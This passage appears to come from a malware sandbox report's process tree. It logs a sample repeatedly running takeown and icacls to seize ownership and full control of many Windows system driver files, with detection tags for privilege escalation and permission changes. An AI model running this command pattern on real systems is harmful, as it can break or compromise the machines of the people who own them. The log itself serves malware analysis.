C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\lsi_sas2.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:4072
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lsi_scsi.sys && icacls C:\Windows\System32\drivers\lsi_scsi.sys /grant "%username%:F" && exit2⤵PID:3888
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\lsi_scsi.sys3⤵PID:3704
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\lsi_scsi.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:3140
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\luafv.sys && icacls C:\Windows\System32\drivers\luafv.sys /grant "%username%:F" && exit2⤵PID:3936
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\luafv.sys3⤵PID:3132
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\luafv.sys /grant "Admin:F"3⤵PID:3300
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mcd.sys && icacls C:\Windows\System32\drivers\mcd.sys /grant "%username%:F" && exit2⤵PID:3732
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mcd.sys3⤵PID:3720
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mcd.sys /grant "Admin:F"3⤵PID:3504
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\megasas.sys && icacls C:\Windows\System32\drivers\megasas.sys /grant "%username%:F" && exit2⤵PID:3768
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\megasas.sys3⤵PID:4056
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\megasas.sys /grant "Admin:F"3⤵PID:3684
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\MegaSR.sys && icacls C:\Windows\System32\drivers\MegaSR.sys /grant "%username%:F" && exit2⤵PID:1192
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\MegaSR.sys3⤵PID:3708
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\MegaSR.sys /grant "Admin:F"3⤵PID:3136
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\modem.sys && icacls C:\Windows\System32\drivers\modem.sys /grant "%username%:F" && exit2⤵PID:3320
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\modem.sys3⤵PID:3620
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\modem.sys /grant "Admin:F"3⤵PID:1088
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\monitor.sys && icacls C:\Windows\System32\drivers\monitor.sys /grant "%username%:F" && exit2⤵PID:4080
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\monitor.sys3⤵PID:3536
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\monitor.sys /grant "Admin:F"3⤵PID:3208
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mouclass.sys && icacls C:\Windows\System32\drivers\mouclass.sys /grant "%username%:F" && exit2⤵PID:3192
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mouclass.sys3⤵PID:4068
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mouclass.sys /grant "Admin:F"3⤵PID:3200
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mouhid.sys && icacls C:\Windows\System32\drivers\mouhid.sys /grant "%username%:F" && exit2⤵PID:3244
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mouhid.sys3⤵PID:3460
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mouhid.sys /grant "Admin:F"3⤵PID:3300
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mountmgr.sys && icacls C:\Windows\System32\drivers\mountmgr.sys /grant "%username%:F" && exit2⤵PID:3776
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mountmgr.sys3⤵PID:4064
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mountmgr.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:3600
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mpio.sys && icacls C:\Windows\System32\drivers\mpio.sys /grant "%username%:F" && exit2⤵PID:3128
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mpio.sys3⤵PID:4076
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mpio.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3860
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mpsdrv.sys && icacls C:\Windows\System32\drivers\mpsdrv.sys /grant "%username%:F" && exit2⤵PID:4048
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mpsdrv.sys3⤵PID:2232
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mpsdrv.sys /grant "Admin:F"3⤵PID:3592
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mrxdav.sys && icacls C:\Windows\System32\drivers\mrxdav.sys /grant "%username%:F" && exit2⤵PID:3924
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mrxdav.sys3⤵PID:4072
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mrxdav.sys /grant "Admin:F"3⤵PID:2632
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mrxsmb.sys && icacls C:\Windows\System32\drivers\mrxsmb.sys /grant "%username%:F" && exit2⤵PID:3268
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mrxsmb.sys3⤵PID:2928
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mrxsmb.sys /grant "Admin:F"3⤵PID:3508
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mrxsmb10.sys && icacls C:\Windows\System32\drivers\mrxsmb10.sys /grant "%username%:F" && exit2⤵PID:3536
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mrxsmb10.sys3⤵PID:4068
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mrxsmb10.sys /grant "Admin:F"3⤵PID:3752
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mrxsmb20.sys && icacls C:\Windows\System32\drivers\mrxsmb20.sys /grant "%username%:F" && exit2⤵PID:3308
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mrxsmb20.sys3⤵PID:1324
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mrxsmb20.sys /grant "Admin:F"3⤵PID:3076
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msahci.sys && icacls C:\Windows\System32\drivers\msahci.sys /grant "%username%:F" && exit2⤵PID:1704
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\msahci.sys3⤵PID:3860
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\msahci.sys /grant "Admin:F"3⤵PID:3200
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msdsm.sys && icacls C:\Windows\System32\drivers\msdsm.sys /grant "%username%:F" && exit2⤵PID:696
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\msdsm.sys3⤵PID:3604
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\msdsm.sys /grant "Admin:F"3⤵PID:3196
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msfs.sys && icacls C:\Windows\System32\drivers\msfs.sys /grant "%username%:F" && exit2⤵PID:3204
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\msfs.sys3⤵PID:2632
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\msfs.sys /grant "Admin:F"3⤵PID:4068
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\MsftWdf_Kernel_01009_Inbox_Critical.Wdf && icacls C:\Windows\System32\drivers\MsftWdf_Kernel_01009_Inbox_Critical.Wdf /grant "%username%:F" && exit2⤵PID:3652
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\MsftWdf_Kernel_01009_Inbox_Critical.Wdf3⤵PID:3860
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\MsftWdf_Kernel_01009_Inbox_Critical.Wdf /grant "Admin:F"3⤵PID:2972
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mshidkmdf.sys && icacls C:\Windows\System32\drivers\mshidkmdf.sys /grant "%username%:F" && exit2⤵PID:3356
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mshidkmdf.sys3⤵
- Modifies file permissions
PID:1324
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mshidkmdf.sys /grant "Admin:F"3⤵PID:3568
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msisadrv.sys && icacls C:\Windows\System32\drivers\msisadrv.sys /grant "%username%:F" && exit2⤵PID:2472
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\msisadrv.sys3⤵PID:3364
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\msisadrv.sys /grant "Admin:F"3⤵PID:3548
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msiscsi.sys && icacls C:\Windows\System32\drivers\msiscsi.sys /grant "%username%:F" && exit2⤵PID:3752
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\msiscsi.sys3⤵
- Possible privilege escalation attempt
PID:4056
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\msiscsi.sys /grant "Admin:F"3⤵PID:4072
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mskssrv.sys && icacls C:\Windows\System32\drivers\mskssrv.sys /grant "%username%:F" && exit2⤵PID:3968
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mskssrv.sys3⤵PID:1060
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mskssrv.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:3436
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mspclock.sys && icacls C:\Windows\System32\drivers\mspclock.sys /grant "%username%:F" && exit2⤵PID:2416
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mspclock.sys3⤵PID:2972
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mspclock.sys /grant "Admin:F"3⤵PID:4072
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mspqm.sys && icacls C:\Windows\System32\drivers\mspqm.sys /grant "%username%:F" && exit2⤵PID:3076
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mspqm.sys3⤵PID:3592
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mspqm.sys /grant "Admin:F"3⤵PID:3340
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msrpc.sys && icacls C:\Windows\System32\drivers\msrpc.sys /grant "%username%:F" && exit2⤵PID:828
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\msrpc.sys3⤵
- Possible privilege escalation attempt
PID:3692
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\msrpc.sys /grant "Admin:F"3⤵PID:1060
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mssmbios.sys && icacls C:\Windows\System32\drivers\mssmbios.sys /grant "%username%:F" && exit2⤵PID:3208
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mssmbios.sys3⤵PID:2860
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mssmbios.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:4028
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mstee.sys && icacls C:\Windows\System32\drivers\mstee.sys /grant "%username%:F" && exit2⤵PID:3132
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mstee.sys3⤵PID:4056
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mstee.sys /grant "Admin:F"3⤵PID:3432
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\MTConfig.sys && icacls C:\Windows\System32\drivers\MTConfig.sys /grant "%username%:F" && exit2⤵PID:3568
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\MTConfig.sys3⤵PID:3704
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\MTConfig.sys /grant "Admin:F"3⤵PID:3360
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mup.sys && icacls C:\Windows\System32\drivers\mup.sys /grant "%username%:F" && exit2⤵PID:2664
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mup.sys3⤵PID:3136
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mup.sys /grant "Admin:F"3⤵PID:4052
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndis.sys && icacls C:\Windows\System32\drivers\ndis.sys /grant "%username%:F" && exit2⤵PID:2972
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ndis.sys3⤵
- Modifies file permissions
PID:3620
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ndis.sys /grant "Admin:F"3⤵PID:4056
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndiscap.sys && icacls C:\Windows\System32\drivers\ndiscap.sys /grant "%username%:F" && exit2⤵PID:2632
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ndiscap.sys3⤵PID:3196
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ndiscap.sys /grant "Admin:F"3⤵PID:3068
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndistapi.sys && icacls C:\Windows\System32\drivers\ndistapi.sys /grant "%username%:F" && exit2⤵PID:3920
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ndistapi.sys3⤵PID:3092
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ndistapi.sys /grant "Admin:F"3⤵PID:4052
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndisuio.sys && icacls C:\Windows\System32\drivers\ndisuio.sys /grant "%username%:F" && exit2⤵PID:3884
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ndisuio.sys3⤵PID:4068
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ndisuio.sys /grant "Admin:F"3⤵PID:4064
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndiswan.sys && icacls C:\Windows\System32\drivers\ndiswan.sys /grant "%username%:F" && exit2⤵PID:3788
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ndiswan.sys3⤵
- Possible privilege escalation attempt
PID:3068
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ndiswan.sys /grant "Admin:F"3⤵PID:1324
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndproxy.sys && icacls C:\Windows\System32\drivers\ndproxy.sys /grant "%username%:F" && exit2⤵PID:3300
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ndproxy.sys3⤵PID:4068
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ndproxy.sys /grant "Admin:F"3⤵PID:3720
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\netbios.sys && icacls C:\Windows\System32\drivers\netbios.sys /grant "%username%:F" && exit2⤵PID:3196
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\netbios.sys3⤵PID:4104
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\netbios.sys /grant "Admin:F"3⤵PID:4160
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\netbt.sys && icacls C:\Windows\System32\drivers\netbt.sys /grant "%username%:F" && exit2⤵PID:3140
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\netbt.sys3⤵PID:4112
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\netbt.sys /grant "Admin:F"3⤵PID:4192
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\netio.sys && icacls C:\Windows\System32\drivers\netio.sys /grant "%username%:F" && exit2⤵PID:3336
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\netio.sys3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4140
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\netio.sys /grant "Admin:F"3⤵PID:4176
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nfrd960.sys && icacls C:\Windows\System32\drivers\nfrd960.sys /grant "%username%:F" && exit2⤵PID:3548
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\nfrd960.sys3⤵PID:4248
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\nfrd960.sys /grant "Admin:F"3⤵PID:4288
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\npfs.sys && icacls C:\Windows\System32\drivers\npfs.sys /grant "%username%:F" && exit2⤵PID:4120
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\npfs.sys3⤵PID:4240
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\npfs.sys /grant "Admin:F"3⤵PID:4280
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nsiproxy.sys && icacls C:\Windows\System32\drivers\nsiproxy.sys /grant "%username%:F" && exit2⤵PID:4184
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\nsiproxy.sys3⤵PID:4352
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\nsiproxy.sys /grant "Admin:F"3⤵PID:4420
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ntfs.sys && icacls C:\Windows\System32\drivers\ntfs.sys /grant "%username%:F" && exit2⤵PID:4232
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ntfs.sys3⤵PID:4320
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ntfs.sys /grant "Admin:F"3⤵PID:4360
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\null.sys && icacls C:\Windows\System32\drivers\null.sys /grant "%username%:F" && exit2⤵PID:4304
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\null.sys3⤵PID:4368
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\null.sys /grant "Admin:F"3⤵PID:4412
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nvraid.sys && icacls C:\Windows\System32\drivers\nvraid.sys /grant "%username%:F" && exit2⤵PID:4376
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\nvraid.sys3⤵PID:4476
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\nvraid.sys /grant "Admin:F"3⤵PID:4516
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nvstor.sys && icacls C:\Windows\System32\drivers\nvstor.sys /grant "%username%:F" && exit2⤵PID:4428
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\nvstor.sys3⤵PID:4488
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\nvstor.sys /grant "Admin:F"3⤵PID:4560
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\NV_AGP.SYS && icacls C:\Windows\System32\drivers\NV_AGP.SYS /grant "%username%:F" && exit2⤵PID:4468
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\NV_AGP.SYS3⤵
- Modifies file permissions
PID:4640
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\NV_AGP.SYS /grant "Admin:F"3⤵PID:4728
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nwifi.sys && icacls C:\Windows\System32\drivers\nwifi.sys /grant "%username%:F" && exit2⤵PID:4504
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\nwifi.sys3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4632
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\nwifi.sys /grant "Admin:F"3⤵PID:4740
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ohci1394.sys && icacls C:\Windows\System32\drivers\ohci1394.sys /grant "%username%:F" && exit2⤵PID:4528
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ohci1394.sys3⤵PID:4648
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ohci1394.sys /grant "Admin:F"3⤵PID:4716
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pacer.sys && icacls C:\Windows\System32\drivers\pacer.sys /grant "%username%:F" && exit2⤵PID:4580
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\pacer.sys3⤵PID:4656
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\pacer.sys /grant "Admin:F"3⤵PID:4760
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\parport.sys && icacls C:\Windows\System32\drivers\parport.sys /grant "%username%:F" && exit2⤵PID:4620
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\parport.sys3⤵PID:4800
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\parport.sys /grant "Admin:F"3⤵PID:4880
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\partmgr.sys && icacls C:\Windows\System32\drivers\partmgr.sys /grant "%username%:F" && exit2⤵PID:4676
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\partmgr.sys3⤵PID:4832
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\partmgr.sys /grant "Admin:F"3⤵PID:4888
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pci.sys && icacls C:\Windows\System32\drivers\pci.sys /grant "%username%:F" && exit2⤵PID:4692
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\pci.sys3⤵
- Possible privilege escalation attempt
PID:4820
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\pci.sys /grant "Admin:F"3⤵PID:4856
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pciide.sys && icacls C:\Windows\System32\drivers\pciide.sys /grant "%username%:F" && exit2⤵PID:4792
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\pciide.sys3⤵PID:4896
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\pciide.sys /grant "Admin:F"3⤵PID:4936
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pciidex.sys && icacls C:\Windows\System32\drivers\pciidex.sys /grant "%username%:F" && exit2⤵PID:4844
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\pciidex.sys3⤵PID:4952
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\pciidex.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:5008
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pcmcia.sys && icacls C:\Windows\System32\drivers\pcmcia.sys /grant "%username%:F" && exit2⤵PID:4924
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\pcmcia.sys3⤵PID:5108
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\pcmcia.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:4176
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pcw.sys && icacls C:\Windows\System32\drivers\pcw.sys /grant "%username%:F" && exit2⤵PID:4960
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\pcw.sys3⤵PID:5060
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\pcw.sys /grant "Admin:F"3⤵PID:3272
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\PEAuth.sys && icacls C:\Windows\System32\drivers\PEAuth.sys /grant "%username%:F" && exit2⤵PID:4992
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\PEAuth.sys3⤵PID:3692
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\PEAuth.sys /grant "Admin:F"3⤵PID:4144
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\portcls.sys && icacls C:\Windows\System32\drivers\portcls.sys /grant "%username%:F" && exit2⤵PID:5040
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\portcls.sys3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1324
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\portcls.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:4156
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\processr.sys && icacls C:\Windows\System32\drivers\processr.sys /grant "%username%:F" && exit2⤵PID:5076
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\processr.sys3⤵
- Possible privilege escalation attempt
PID:3504
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\processr.sys /grant "Admin:F"3⤵PID:4200
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ql2300.sys && icacls C:\Windows\System32\drivers\ql2300.sys /grant "%username%:F" && exit2⤵PID:5116
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ql2300.sys3⤵PID:3600
-
-
